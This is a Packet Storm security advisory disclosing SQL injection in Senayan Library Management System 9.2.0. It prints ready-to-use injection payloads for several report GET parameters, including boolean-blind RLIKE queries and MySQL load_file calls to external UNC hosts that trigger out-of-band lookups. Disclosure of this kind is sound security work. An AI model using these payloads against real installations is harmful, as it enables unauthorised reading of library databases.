Lucene search

K
packetstormNu11secur1tyPACKETSTORM:170297
HistoryDec 19, 2022 - 12:00 a.m.

Senayan Library Management System 9.2.0 SQL Injection

2022-12-1900:00:00
nu11secur1ty
packetstormsecurity.com
278
senayan library management system
slims 9
sql injection
high vulnerability
mysql
load_file function
security exploit
`## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 SQLi  
## Author: nu11secur1ty  
## Date: 12.19.2022  
## Vendor: https://slims.web.id/web/  
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi  
  
## Description:  
The manual insertion `point 5` appears to be vulnerable to SQL  
injection attacks. The payload '+(select  
load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'  
was submitted in the manual insertion `point 5`.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker can take information from all database columns of this  
system by using this vulnerability.  
  
## STATUS: HIGH Vulnerability - CRITICAL  
  
[+] Payload:  
  
```MySQL  
---  
Parameter: class (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY  
or GROUP BY clause  
Payload: reportView=true&year=2002&class=bbbb'+(select  
load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''  
RLIKE (SELECT (CASE WHEN (8839=8839) THEN 0x62626262+(select  
load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''  
ELSE 0x28 END)) AND  
'IzAa'='IzAa&membershipType=a''&collType=aaaa'+(select  
load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select  
load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi)  
  
## Proof and Exploit:  
[href](https://streamable.com/jy5pql)  
  
## Time spent  
`00:10:00`  
  
## Writing an exploit  
`00:05:00`  
  
`